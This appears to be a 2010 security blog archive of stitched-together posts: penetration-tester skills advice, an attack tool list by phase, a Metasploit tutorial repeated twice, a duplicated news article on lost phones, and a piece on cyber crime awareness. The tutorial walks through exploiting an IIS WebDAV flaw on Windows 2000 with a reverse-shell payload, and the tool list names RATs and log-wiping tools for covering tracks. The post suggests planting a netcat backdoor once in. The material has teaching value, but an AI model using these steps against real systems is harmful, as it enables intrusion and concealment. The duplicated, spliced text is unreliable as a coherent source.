Based on questions I’ve gotten over the years and specifically in class, I’ve decided that we need to address some basic skills that every penetration tester should have. While we can’t realistically expect everyone to have the exact same skill set, there are some commonalities.
1. Mastery of an operating system. I can’t stress how important it is. So many people want to become hackers or systems security experts, without actually knowing the systems they’re supposed to be hacking or securing. It’s common knowledge that once you’re on a target/victim, you need to somewhat put on the hat of a sysadmin. After all, having root means nothing if you don’t know what to do with root. How can you cover your tracks if you don’t even know where you’ve left tracks? If you don’t know the OS in detail, how can you possibly know everywhere things are logged?
2. Good knowledge of networking and network protocols. Being able to list the OSI model DOES NOT qualify as knowing networking and network protocols. You must know TCP in and out. Not just that it stands for Transmission Control Protocol, but actually know that structure of the packet, know what’s in it, know how it works in detail. A good place to start is TCP/IP Illustrated by Richard Steven (either edition works). Know the difference between TCP and UDP. Understand routing, be able to in detail describe how a packet gets from one place to another. Know how DNS works, and know it in detail. Understand ARP, how it’s used, why it’s used. Understand DHCP. What’s the process for getting an automatic IP address? What happens when you plug in? What type of traffic does your NIC generate when it’s plugged in and tries to get an automatically assigned address? Is it layer 2 traffic? Layer 3 traffic?
3. If you don’t understand the things in item 2, then you can’t possibly understand how an ARP Spoof or a MiTM attack actually works. In short how can you violate or manipulate a process, if you don’t even know how the process works, or worse, you don’t even know the process exists! Which brings me to the next point. In general you should be curious as to how things work. I’ve evaluated some awesome products in the last 10 years, and honestly, after I see it work, the first thing that comes to my mind is “how does it work”.
4. Learn some basic scripting. Start with something simple like vbs or Bash. As a matter of fact, I’ll be posting a “Using Bash Scripts to Automate Recon” video tonight. So if you don’t have anywhere else to start, you can start there! Eventually you’ll want to graduate from scripting and start learning to actually code/program or in short write basic software (hello world DOES NOT count).
5. Get yourself a basic firewall, and learn how to configure it to block/allow only what you want. Then practice defeating it. You can find cheap used routers and firewalls on ebay, or maybe ask your company for old ones. Start with simple ACL’s on a router. Learn how to scan past them using basic IP spoofing and other simple techniques. There’s not better way to understand these concepts than to apply them. Once you’re mastered this, you can move to a PIX, or ASA and start the process over again. Start experimenting with trying to push Unicode through it, and other attacks. Spend time on this site and other places to find info on doing these things. Really the point is to learn to do them.
6. Know some forensics! This will only make you better at covering your tracks. The implications should be obvious.
7. Eventually learn a programming language, then learn a few more. Don’t go and by a “How to program in C” book or anything like that. Figure out something you want to automate, or think of something simple you’d like to create. For example, a small port scanner. Grab a few other port scanners (like nmap), look at the source code, see if you can figure any of it out. Then ask questions on forums and other places. Trust me, it’ll start off REALLY shaky, but just keep chugging away!
8. Have a desire and drive to learn new stuff. This is a must; It’s probably more important than everything else listed here. You need to be willing to put in some of your own time (time you’re not getting paid for), to really get a handle on things and stay up to date.
9. Learn a little about databases, and how they work. Go download mysql, read some of the tutorials on how to create simple sample databases. I’m not saying you need to be a DB expert, but knowing the basic constructs help.
10. Always be willing to interact and share your knowledge with like minded professionals and other smart people. Some of the most amazing hackers I know have jobs like pizza delivery, janitorial, one is a marketing exec, another is actually an MD. They do this strictly because they love to. And one thing I see in them all is their excitement and willingness to share what they’ve learned with people who actually care to listen and are interested in the same.
Reference:www.google.com
Saturday, November 27, 2010
Jose Penetration Tools List
Let me just say that I’m subject to use Backtrack in any phase.
1. Google (1st stop for passive recon), facebook, myspace, linkedin etc. (Find info on individuals)
2. Netcraft (find passive info about web servers.
3. Whois
4. Geo Spider
5. Google Earth
6. HTTrack
7. Webripper
8. Wireshark (I use in almost every phase. I wanna see if their website is sending me any tracking goodies while I’m reconning it.)
9. Paros (Same as above, plus I use it to study authentication methods, and other stuff on their sites)
1. Nmap
2. Firewalk
3. Hping
4. Modem Scan
5. THC Scan
6. Tone Loc
7. p0f
8. Solarwinds
9. TCPTraceroute
Phase 3 Vulnerability Research
1. (I pretty much go manual here, but there’s always Nessus, ISS and others).
2. I usually try and build something that looks as close as possible to my target, and practice exploiting them. I count this as part of my vulnerability research.
3. Places I check are Secunia, Seclist, Milw0rm, Eeye, Metasploit.com, Securiteam, and a few others.
4. Vendor websites.
Breaking in
1. Manual exploit code
2. Metasploit
3. Core Impact (Large scale (5000 or more nodes to penetrate).
1. Kerb Crack
2. Pwdump
3. Cain & Able
4. John the Ripper
5. Rainbow Crack
6. Hydra
Trojans & Rootkit
1. I usually make my own. But some good POC ones are Poison Ivy, Nuclear RAT, Netbus.
1. Dsniff
2. Tcpdump
3. Arpspoof
4. Putty
5. Recub
6. Scapy (to trick devices and anything else which accepts or send packets)
7. WebScarab (studying HTTPS and other secure authentication processes)
8. IDA Pro (reversing any custom apps I find being used internally).
9. Olly Debug (same as above).
10. Yersinia (VLAN hopping, and other low stack level attacks)
1. RM, delete, erase, etc (obviously).
2. Clearlogs
3. Wipe utility
4. ADS
5. Winzapper (not a big fan, but when I have to…..)
Phase 1 Passive Reconnaissance
1. Google (1st stop for passive recon), facebook, myspace, linkedin etc. (Find info on individuals)
2. Netcraft (find passive info about web servers.
3. Whois
4. Geo Spider
5. Google Earth
6. HTTrack
7. Webripper
8. Wireshark (I use in almost every phase. I wanna see if their website is sending me any tracking goodies while I’m reconning it.)
9. Paros (Same as above, plus I use it to study authentication methods, and other stuff on their sites)
Phase 2 Scanning
1. Nmap
2. Firewalk
3. Hping
4. Modem Scan
5. THC Scan
6. Tone Loc
7. p0f
8. Solarwinds
9. TCPTraceroute
Phase 3 Vulnerability Research
1. (I pretty much go manual here, but there’s always Nessus, ISS and others).
2. I usually try and build something that looks as close as possible to my target, and practice exploiting them. I count this as part of my vulnerability research.
3. Places I check are Secunia, Seclist, Milw0rm, Eeye, Metasploit.com, Securiteam, and a few others.
4. Vendor websites.
Phase 4 Penetration/Hacking
Breaking in
1. Manual exploit code
2. Metasploit
3. Core Impact (Large scale (5000 or more nodes to penetrate).
Password Cracking
1. Kerb Crack
2. Pwdump
3. Cain & Able
4. John the Ripper
5. Rainbow Crack
6. Hydra
Trojans & Rootkit
1. I usually make my own. But some good POC ones are Poison Ivy, Nuclear RAT, Netbus.
Phase 5 Going Deeper
1. Dsniff
2. Tcpdump
3. Arpspoof
4. Putty
5. Recub
6. Scapy (to trick devices and anything else which accepts or send packets)
7. WebScarab (studying HTTPS and other secure authentication processes)
8. IDA Pro (reversing any custom apps I find being used internally).
9. Olly Debug (same as above).
10. Yersinia (VLAN hopping, and other low stack level attacks)
Phase 6 Covering Tracks
1. RM, delete, erase, etc (obviously).
2. Clearlogs
3. Wipe utility
4. ADS
5. Winzapper (not a big fan, but when I have to…..)
Wednesday, November 17, 2010
Metasploit Tutorial
How tough is it to really compromise a system? As an ethical hacking instructor, that is a question that I get asked quite frequently. My usual response to this type of question is to encourage the questioner to try to compromise a system, which they own, to find out the time and skill necessary to compromise a system. There is real value in getting a true sense of what it really takes to actually defeat common security measures. This provides first hand experience that cannot really be duplicated from listening to an industry expert or from reading articles and books. The main reason for this is that there is a lot of misinformation, some intentional and some not, available. The easiest way to determine just how difficult something like compromising systems or defeating wireless encryption is – is to try it for yourself.
Most security professionals are aware attacking and penetrating network devices is getting easier and attack sophistication is getting more complex. In large part this phenomenon is due to the old adage of "standing on the shoulders of giants." Many system researchers have uncovered the security weakness is common system design years ago, and as security professionals they shared the information. This allows someone with little understanding of system architecture to be able to perform more complex attacks than ever though possible.
For a security professional it is possible to compromise a system without spending months learning a programming language and years learning system architecture. We can actually use technology to assist in performing penetration system penetration. Products like Core Security's Core Impact and Immunity's Canvas products (See post:Hacking with Exploit Frameworks) have been providing this type of functionality for a few years now. These manufacturers do not just provide the technology, but they also provide training and support of their products to allow a qualified professional to perform a more methodological penetration test. It makes the task of compromising a system easier for a security administrator.
The previously mentioned utilities are both fee based products, but more recently an open source product has become a common sight in penetration testing kits. This utility is called Metasploit™. Both Windows and Linux users can take advantage of the Metasploit™ product to perform a penetration test or system compromise. The utility itself is written in many programming languages including perl, C, and assembler.
This environment provides many ready to use exploits and also allows for the security tester to customize them or to create their own exploit. The basic process for using the Metasploit™ console is not the most intuitive, but I think this was done to discourage the least skilled script kiddies from attempting to penetrate the system using this specific utility. The basic format for exploiting the system is as follows:
1. Pick which exploit to use
2. Configure the exploit with remote IP address and remote port number
3. Pick a payload
4. Configure the payload with local IP address and local port number
5. Execute the exploit
While this process is much more difficult to do than just a "point and click" utility, it should not take more than an hour or so to get a good feel for the overall process. Perhaps the easiest mechanism for using the Metasploit™ utility is to take advantage of a bootable "Live CD" such as Whoppix or Auditor.
Many experts believe that understanding how to compromise a system is knowledge that should not be shared and utilities such as Metasploit™, Canvas, and Core Impact make it easier for systems to be compromised or exploit code to be developed. To a certain point it can not be argued that these utilities make the process easier, but there has not been a major increase in the amount of exploit code available since the release of these tools. Also remember that the security hole is not in the fact that exploit code exists that allows an attacker to penetrate a system – the hole is in the fact that the underlying vulnerability exists in the first place.
It is also worthy of note that most system attackers already have the necessary knowledge of how to compromise systems or how to develop exploit code. These utilities give the security administrator the opportunity to test their own systems for security weaknesses before an attacker discovers this and in a way this begins to level the playing field for the security administration staff. In fact these types of utilities may eventually become common practice for system developers to use while writing the application and this may stop the vulnerability from ever being published in the first place.
I encourage you to find some time to sit down and download a "Live CD" distribution, fire it up, and check out one of the utilities mentioned above. So that if someone ever mentions the difficulty involved in compromising a system you will know exactly what it really takes.
Example of Using Metasploit™
The goal of the exercise below is to become familiar with the Metasploit™ framework and to perform a compromise of a Windows 2000 system. These steps can be done easily from most popular bootable CD Linux distributions. The steps below are for use with the Whoppix/Whax distro (http://ftp.belnet.be/linux/whoppix/). I understand that some people prefer the web interface for using Metasploit™, but from our extensive testing we have found the good old command line to be more reliable.
To begin, boot to your CD and pull up a shell window. From there you will need to move to the Metasploit™ directory. To do this from a command prompt type:
cd /KNOPPIX/pentest/exploits/framework-2.3/
Launch the Metasploit™ console. To do this, from a command line type the following:
# " ./msfconsole "
Pick which exploit to use
Once the msfconsole is running, it is time to decide which exploit to attempt against the target system. Your options here stub from the following commands:
* use
* show
* info
The use command will tell the utility exactly which exploit to select. The show command will do nothing on its own, but can be combined with exploits or payloads as shown in the examples below. The info command provides details about a specific module.
Start by entering "show exploits" to see the list of exploits available. Pretty impressive, huh? Many of the exploits listed here are going to work against the target servers and in fact we use many of these exploits in the ethical hacking course.
If you need some hints, I recommend starting with the "iis50_webdav_ntdll" exploit.
To actually start the exploit type "use iis50_webdav_ntdll"
After use – configure options
We’ve selected our exploit, but we are not done yet. We need to set options. These options include the destination IP and the destination port. The options are configured by using the set command. The show advanced command will let you know if there are more options that can be set. Most exploits do not have advanced options.
Start by typing "show options"
This will show you the command requirements to run the exploit.
These include the RHOST (This is the host that we are going to compromise) and the RPORT (this is the port that the vulnerable function is running on)
To set these options type "set RHOST" and press enter. On the next line type "set RPORT 80"
Is the exploit going to work?
We have a system, we have an exploit. Are we going to be able to compromise the system? Now is the time to find out.
To perform the check type "check ".
This may not work on all exploits. This will see if the server or target appears vulnerable.
For some exploits you might have to provide information about what type of system to compromise. With the attack listed above this is not necessary. If you want to know why this is important sign-up for the ethical hacking courses. Here are steps if you use an exploit that requires you to select a target.
If your check is unsuccessful, you may need to select some additional options about the target that you are hoping to compromise. This usually includes a description of the OS and the service pack level of the system. In some modules there is a brute force option. What is being configured here is the memory offset that the utility will use to find the vulnerable function. The brute force option will try many memory offsets, but the result will be a lot less stealthy if you are unsuccessful. If you enter "show targets" you should see something like the below.
msf iis50_webdav_ntdll > show targets
Supported Exploit Targets
=========================
0 Windows 2000 Bruteforce
What do we want a successful attack to do?
What Metasploit™ calls a payload, many others refer to as shell code or opcode. This is the code that we wish to have inserted directly into the buffer that we are overflowing. In most cases the shell code is going to be service pack dependant, OS dependant, and architecture (i386) dependant as well. This means that most of the payloads in the Metasploit™ framework will work for only certain OS’s and on certain processors. Even if you select an appropriate payload you will have to configure options to get the payload to work. The most frequently used type of shell code is code that generates a reverse shell from the compromised system back to the attacking system. Using the stubs mentioned before in the exploits section also apply to the payloads section. If you type "show payloads" you should see a response like the below .
msf iis50_webdav_ntdll > show payloads
Metasploit™ Framework Usable Payloads
====================================
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject
In this case the best shell to try will be the win32_reverse payload. To do this type "set PAYLOAD win32_reverse"
This payload requires some options. These include the exit function, the local host and the local port.
To see these options type "show options" you should see something like the below:
msf iis50_webdav_ntdll(win32_reverse) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ----------- ------------------
optional SSL Use SSL
required RHOST 67.36.70.19 The target address
required RPORT 80 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
Target: Windows 2000 Bruteforce
To set the missing options, we will use the set command like above. Before we can set these values we need to know what they are. To find your local IP address open another shell window, by either right clicking on the desktop or (if your CD has this option) look for the computer icon in the program bar. If you right click on the desktop look for the shell option. If you do this step right you should see a new shell box (kinda sorta like a DOS command prompt box on XP) appear.
Once you have the box open type "ifconfig". This will show the information for all of the interfaces for you linux system. This is the equivalent of the ipconfig command in Windows. You should see something like the following:
[root@localhost ~]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:03:25:13:43:F2
inet addr:10.5.14.173 Bcast:10.5.15.255 Mask:255.255.252.0
inet6 addr: fe80::203:25ff:fe13:43f2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4563 errors:0 dropped:0 overruns:0 frame:0
TX packets:2905 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3696580 (3.5 MiB) TX bytes:325618 (317.9 KiB)
Interrupt:193 Base address:0x4c00
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:213 errors:0 dropped:0 overruns:0 frame:0
TX packets:213 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:49707 (48.5 KiB) TX bytes:49707 (48.5 KiB)
What we are interested in, is the value for the eth0 (or whatever is active on your system it could be eth1 or some other interface), but you should see the value inet addr: and your IP address listed next to this. In the example above the IP address is 10.5.14.173. If you look closely you'll see that it is there. GO ahead and look – no one will laugh I promise.
Once we know this value we will set it with the set command. To do this type "set LHOST". This is all that really needs to be set, but for luck I always make one more change – I set the local port to 5555. This is just for superstition. I'm not going to give you exact instructions on how to do this, but if you can figure it out – be my guest and change it.
This payload with this exploit had no advanced options, but to check for other exploits type "show advanced". You should see something like the below.
msf iis50_webdav_ntdll(win32_reverse) > show advanced
Exploit and Payload Options
===========================
Exploit (Msf::Exploit::iis50_webdav_ntdll):
-------------------------------------------
Payload (Msf::Payload::win32_reverse):
--------------------------------------
Making it all happen
Now is the time to see the fruits of your labor. This next phase will actually compromise the system if you have done everything correctly and the system is vulnerable. If all goes well you will own the box.
To do this type "exploit"
Once you launch the exploit it may take some time. The exploit is trying to brute force the memory offset for the vulnerable function. If you don't know what this means and want to learn – see the ethical hacking class as listed above.
If you've done everything right you should see something like the below.
[*] Starting Reverse Handler.
[*] Connecting to web server. OK
[*] Trying return address 0x004e004f...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00420041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00430041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c10041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c30041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c90041...
[*] Sending request (65739 bytes)
If you are successful you'll have a remote connection into the target machine and can do whatever you want. Once you've done this and received the prompt for the other system you "own the box". I won't tell you what to do next, after all where is the fun in that. Don't trash the system too bad if you want to exploit it again. You might want to try to crack the passwords– or you can create your own netcat backdoor.
Metasploit™ – available from http://www.Metasploit™.com
It is not essential that the user boot a linux CD. To try out the framework on a Windows system, The Metasploit Project does provide a Windows installer on their web site.
Most security professionals are aware attacking and penetrating network devices is getting easier and attack sophistication is getting more complex. In large part this phenomenon is due to the old adage of "standing on the shoulders of giants." Many system researchers have uncovered the security weakness is common system design years ago, and as security professionals they shared the information. This allows someone with little understanding of system architecture to be able to perform more complex attacks than ever though possible.
For a security professional it is possible to compromise a system without spending months learning a programming language and years learning system architecture. We can actually use technology to assist in performing penetration system penetration. Products like Core Security's Core Impact and Immunity's Canvas products (See post:Hacking with Exploit Frameworks) have been providing this type of functionality for a few years now. These manufacturers do not just provide the technology, but they also provide training and support of their products to allow a qualified professional to perform a more methodological penetration test. It makes the task of compromising a system easier for a security administrator.
The previously mentioned utilities are both fee based products, but more recently an open source product has become a common sight in penetration testing kits. This utility is called Metasploit™. Both Windows and Linux users can take advantage of the Metasploit™ product to perform a penetration test or system compromise. The utility itself is written in many programming languages including perl, C, and assembler.
This environment provides many ready to use exploits and also allows for the security tester to customize them or to create their own exploit. The basic process for using the Metasploit™ console is not the most intuitive, but I think this was done to discourage the least skilled script kiddies from attempting to penetrate the system using this specific utility. The basic format for exploiting the system is as follows:
1. Pick which exploit to use
2. Configure the exploit with remote IP address and remote port number
3. Pick a payload
4. Configure the payload with local IP address and local port number
5. Execute the exploit
While this process is much more difficult to do than just a "point and click" utility, it should not take more than an hour or so to get a good feel for the overall process. Perhaps the easiest mechanism for using the Metasploit™ utility is to take advantage of a bootable "Live CD" such as Whoppix or Auditor.
Many experts believe that understanding how to compromise a system is knowledge that should not be shared and utilities such as Metasploit™, Canvas, and Core Impact make it easier for systems to be compromised or exploit code to be developed. To a certain point it can not be argued that these utilities make the process easier, but there has not been a major increase in the amount of exploit code available since the release of these tools. Also remember that the security hole is not in the fact that exploit code exists that allows an attacker to penetrate a system – the hole is in the fact that the underlying vulnerability exists in the first place.
It is also worthy of note that most system attackers already have the necessary knowledge of how to compromise systems or how to develop exploit code. These utilities give the security administrator the opportunity to test their own systems for security weaknesses before an attacker discovers this and in a way this begins to level the playing field for the security administration staff. In fact these types of utilities may eventually become common practice for system developers to use while writing the application and this may stop the vulnerability from ever being published in the first place.
I encourage you to find some time to sit down and download a "Live CD" distribution, fire it up, and check out one of the utilities mentioned above. So that if someone ever mentions the difficulty involved in compromising a system you will know exactly what it really takes.
Example of Using Metasploit™
The goal of the exercise below is to become familiar with the Metasploit™ framework and to perform a compromise of a Windows 2000 system. These steps can be done easily from most popular bootable CD Linux distributions. The steps below are for use with the Whoppix/Whax distro (http://ftp.belnet.be/linux/whoppix/). I understand that some people prefer the web interface for using Metasploit™, but from our extensive testing we have found the good old command line to be more reliable.
To begin, boot to your CD and pull up a shell window. From there you will need to move to the Metasploit™ directory. To do this from a command prompt type:
cd /KNOPPIX/pentest/exploits/framework-2.3/
Launch the Metasploit™ console. To do this, from a command line type the following:
# " ./msfconsole "
Pick which exploit to use
Once the msfconsole is running, it is time to decide which exploit to attempt against the target system. Your options here stub from the following commands:
* use
* show
* info
The use command will tell the utility exactly which exploit to select. The show command will do nothing on its own, but can be combined with exploits or payloads as shown in the examples below. The info command provides details about a specific module.
Start by entering "show exploits" to see the list of exploits available. Pretty impressive, huh? Many of the exploits listed here are going to work against the target servers and in fact we use many of these exploits in the ethical hacking course.
If you need some hints, I recommend starting with the "iis50_webdav_ntdll" exploit.
To actually start the exploit type "use iis50_webdav_ntdll"
After use – configure options
We’ve selected our exploit, but we are not done yet. We need to set options. These options include the destination IP and the destination port. The options are configured by using the set command. The show advanced command will let you know if there are more options that can be set. Most exploits do not have advanced options.
Start by typing "show options"
This will show you the command requirements to run the exploit.
These include the RHOST (This is the host that we are going to compromise) and the RPORT (this is the port that the vulnerable function is running on)
To set these options type "set RHOST
Is the exploit going to work?
We have a system, we have an exploit. Are we going to be able to compromise the system? Now is the time to find out.
To perform the check type "check ".
This may not work on all exploits. This will see if the server or target appears vulnerable.
For some exploits you might have to provide information about what type of system to compromise. With the attack listed above this is not necessary. If you want to know why this is important sign-up for the ethical hacking courses. Here are steps if you use an exploit that requires you to select a target.
If your check is unsuccessful, you may need to select some additional options about the target that you are hoping to compromise. This usually includes a description of the OS and the service pack level of the system. In some modules there is a brute force option. What is being configured here is the memory offset that the utility will use to find the vulnerable function. The brute force option will try many memory offsets, but the result will be a lot less stealthy if you are unsuccessful. If you enter "show targets" you should see something like the below.
msf iis50_webdav_ntdll > show targets
Supported Exploit Targets
=========================
0 Windows 2000 Bruteforce
What do we want a successful attack to do?
What Metasploit™ calls a payload, many others refer to as shell code or opcode. This is the code that we wish to have inserted directly into the buffer that we are overflowing. In most cases the shell code is going to be service pack dependant, OS dependant, and architecture (i386) dependant as well. This means that most of the payloads in the Metasploit™ framework will work for only certain OS’s and on certain processors. Even if you select an appropriate payload you will have to configure options to get the payload to work. The most frequently used type of shell code is code that generates a reverse shell from the compromised system back to the attacking system. Using the stubs mentioned before in the exploits section also apply to the payloads section. If you type "show payloads" you should see a response like the below .
msf iis50_webdav_ntdll > show payloads
Metasploit™ Framework Usable Payloads
====================================
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject
In this case the best shell to try will be the win32_reverse payload. To do this type "set PAYLOAD win32_reverse"
This payload requires some options. These include the exit function, the local host and the local port.
To see these options type "show options" you should see something like the below:
msf iis50_webdav_ntdll(win32_reverse) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ----------- ------------------
optional SSL Use SSL
required RHOST 67.36.70.19 The target address
required RPORT 80 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
Target: Windows 2000 Bruteforce
To set the missing options, we will use the set command like above. Before we can set these values we need to know what they are. To find your local IP address open another shell window, by either right clicking on the desktop or (if your CD has this option) look for the computer icon in the program bar. If you right click on the desktop look for the shell option. If you do this step right you should see a new shell box (kinda sorta like a DOS command prompt box on XP) appear.
Once you have the box open type "ifconfig". This will show the information for all of the interfaces for you linux system. This is the equivalent of the ipconfig command in Windows. You should see something like the following:
[root@localhost ~]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:03:25:13:43:F2
inet addr:10.5.14.173 Bcast:10.5.15.255 Mask:255.255.252.0
inet6 addr: fe80::203:25ff:fe13:43f2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4563 errors:0 dropped:0 overruns:0 frame:0
TX packets:2905 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3696580 (3.5 MiB) TX bytes:325618 (317.9 KiB)
Interrupt:193 Base address:0x4c00
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:213 errors:0 dropped:0 overruns:0 frame:0
TX packets:213 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:49707 (48.5 KiB) TX bytes:49707 (48.5 KiB)
What we are interested in, is the value for the eth0 (or whatever is active on your system it could be eth1 or some other interface), but you should see the value inet addr: and your IP address listed next to this. In the example above the IP address is 10.5.14.173. If you look closely you'll see that it is there. GO ahead and look – no one will laugh I promise.
Once we know this value we will set it with the set command. To do this type "set LHOST
This payload with this exploit had no advanced options, but to check for other exploits type "show advanced". You should see something like the below.
msf iis50_webdav_ntdll(win32_reverse) > show advanced
Exploit and Payload Options
===========================
Exploit (Msf::Exploit::iis50_webdav_ntdll):
-------------------------------------------
Payload (Msf::Payload::win32_reverse):
--------------------------------------
Making it all happen
Now is the time to see the fruits of your labor. This next phase will actually compromise the system if you have done everything correctly and the system is vulnerable. If all goes well you will own the box.
To do this type "exploit"
Once you launch the exploit it may take some time. The exploit is trying to brute force the memory offset for the vulnerable function. If you don't know what this means and want to learn – see the ethical hacking class as listed above.
If you've done everything right you should see something like the below.
[*] Starting Reverse Handler.
[*] Connecting to web server. OK
[*] Trying return address 0x004e004f...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00420041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00430041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c10041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c30041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c90041...
[*] Sending request (65739 bytes)
If you are successful you'll have a remote connection into the target machine and can do whatever you want. Once you've done this and received the prompt for the other system you "own the box". I won't tell you what to do next, after all where is the fun in that. Don't trash the system too bad if you want to exploit it again. You might want to try to crack the passwords– or you can create your own netcat backdoor.
Metasploit™ – available from http://www.Metasploit™.com
It is not essential that the user boot a linux CD. To try out the framework on a Windows system, The Metasploit Project does provide a Windows installer on their web site.
Saturday, November 13, 2010
Cops say lost mobile phones can be easily recovered if police complaint is filed Read more: Cops say lost mobile phones can be easily recovered if po
CHENNAI : Most people who lose their mobile phone do not file a police complaint as they believe the chances of recovering their phone are minimal. However, according to the Chennai suburban police, it is almost certain that you would get back your phone if you file a police complaint with the International Mobile Equipment Identity (IMEI) number.
Suburban Police Commissioner S R Jangid said that on an average, about 150 mobile phones are either stolen or lost in Chennai or its suburbs everyday. In 2009 the police managed to recover 35 mobile phones valued at Rs. 3.25 lakh while this year till date 102 phones worth nearly Rs. 7 lakh have been recovered.
"We have had the support of service providers in locating stolen or lost cell phones without which it is very difficult to track lost phones," he said. "This is among other public services we focus on and our team has done a great job in tracking these devices'' Jangid added. The police commissioner urged people to call 9042400100 to report their missing mobile phones.
Of the 150 mobile phones lost daily, police said that about 50 instruments were stolen by pickpockets, about 30 snatched, and the remaining misplaced. A sizable number of complaints were received from bus passengers in the city suburbs, he added.
Those lodging complaints should furnish complete information including their name and address, model and make of the lost instrument, its number, e-mail address, date of loss and IMEI number. The IMEI number can be obtained by typing *#06# on a GSM mobile phone. The number can also be found beneath the battery. (The IMEI number is unique code encrypted on each genuine mobile phone that can help police track it anywhere in the country even if the SIM card is changed. Whenever a cell phone logs onto a network to make or receive calls, its IMEI number is emitted and gets registered. )
Read more: Cops say lost mobile phones can be easily recovered if police complaint is filed - The Times of India http://timesofindia.indiatimes.com/city/chennai/Cops-say-lost-mobile-phones-can-be-easily-recovered-if-police-complaint-is-filed/articleshow/6916445.cms#ixzz159jZmI9s
Suburban Police Commissioner S R Jangid said that on an average, about 150 mobile phones are either stolen or lost in Chennai or its suburbs everyday. In 2009 the police managed to recover 35 mobile phones valued at Rs. 3.25 lakh while this year till date 102 phones worth nearly Rs. 7 lakh have been recovered.
"We have had the support of service providers in locating stolen or lost cell phones without which it is very difficult to track lost phones," he said. "This is among other public services we focus on and our team has done a great job in tracking these devices'' Jangid added. The police commissioner urged people to call 9042400100 to report their missing mobile phones.
Of the 150 mobile phones lost daily, police said that about 50 instruments were stolen by pickpockets, about 30 snatched, and the remaining misplaced. A sizable number of complaints were received from bus passengers in the city suburbs, he added.
Those lodging complaints should furnish complete information including their name and address, model and make of the lost instrument, its number, e-mail address, date of loss and IMEI number. The IMEI number can be obtained by typing *#06# on a GSM mobile phone. The number can also be found beneath the battery. (The IMEI number is unique code encrypted on each genuine mobile phone that can help police track it anywhere in the country even if the SIM card is changed. Whenever a cell phone logs onto a network to make or receive calls, its IMEI number is emitted and gets registered. )
Read more: Cops say lost mobile phones can be easily recovered if police complaint is filed - The Times of India http://timesofindia.indiatimes.com/city/chennai/Cops-say-lost-mobile-phones-can-be-easily-recovered-if-police-complaint-is-filed/articleshow/6916445.cms#ixzz159jZmI9s
Friday, November 12, 2010
The state of cyber crime awareness amongst the law enforcement agencies
In an instance of a cyber crime investigation in India, a police officer was asked to seize the computer of the hacker. What he brought from the hacker’s premise was his monitor. In another similar instance, the police officials seized the memory and the CD-ROM drive of a hacker’s computer instead of taking out the hard disk.
If that doesn’t explain the state of cyber crime awareness amongst the law enforcement agencies, try reporting a cyber crime and most likely you will never think of contacting the police again for such an instance.
Today’s cyber attacks are not undertaken by amateur hackers who create viruses or malware to prove their worth or to showcase the vulnerabilities of government systems. There is a new economy emerging around cyber crime, which is sophisticated and organized.
In its Cybercrime Intelligence Report of 2009, Finjan shows the operations of the Golden Cash network consisting of an entire trading platform of malware-infested PCs. The trading platform utilizes all necessary components (buyer side, seller side, attack toolkit, and distribution via “partners”). This advanced trading platform marks a new milestone in the evolution of cyber crime.
By turning compromised PCs from a one-time source of profit into a digital asset that can be bought and sold again and again, cybercriminals are maximizing their illegal gains.
